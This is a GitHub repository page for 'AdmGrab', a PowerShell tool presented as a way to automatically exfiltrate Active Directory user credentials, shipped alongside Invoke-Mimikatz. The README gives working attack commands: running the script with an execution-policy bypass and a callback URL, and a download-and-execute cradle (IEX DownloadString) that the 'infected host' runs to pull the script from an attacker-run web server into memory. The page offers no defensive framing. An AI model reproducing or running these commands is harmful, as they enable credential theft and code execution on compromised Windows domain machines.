Skip to content

HansSchouten/AdmGrab

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
AdmGrab.ps1
AdmGrab.ps1
 
 
Invoke-Mimikatz.ps1
Invoke-Mimikatz.ps1
 
 
README.md
README.md
 
 

Repository files navigation

AdmGrab

Automatically exfiltrate AD user credentials.

Local Execution

For execution from file, use powershell.exe -ExecutionPolicy ByPass -File AdmGrab.ps1 -aesKey=KEY -callbackUrl=URL

Remote Execution

To enforce execution in memory start a python webserver in the folder the AdmGrab.ps1 is located

pyton -m SimpleHTTPServer 8080

Suppose you are on IP 10.0.0.1, now force the infected host to run the following command

powershell.exe "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.1:8080/AdmGrab.ps1')"

About

Automatically exfiltrate AD user credentials

Topics

powershell active-directory activedirectory exfiltration

Resources

Readme
Activity

Stars

6 stars

Watchers

3 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages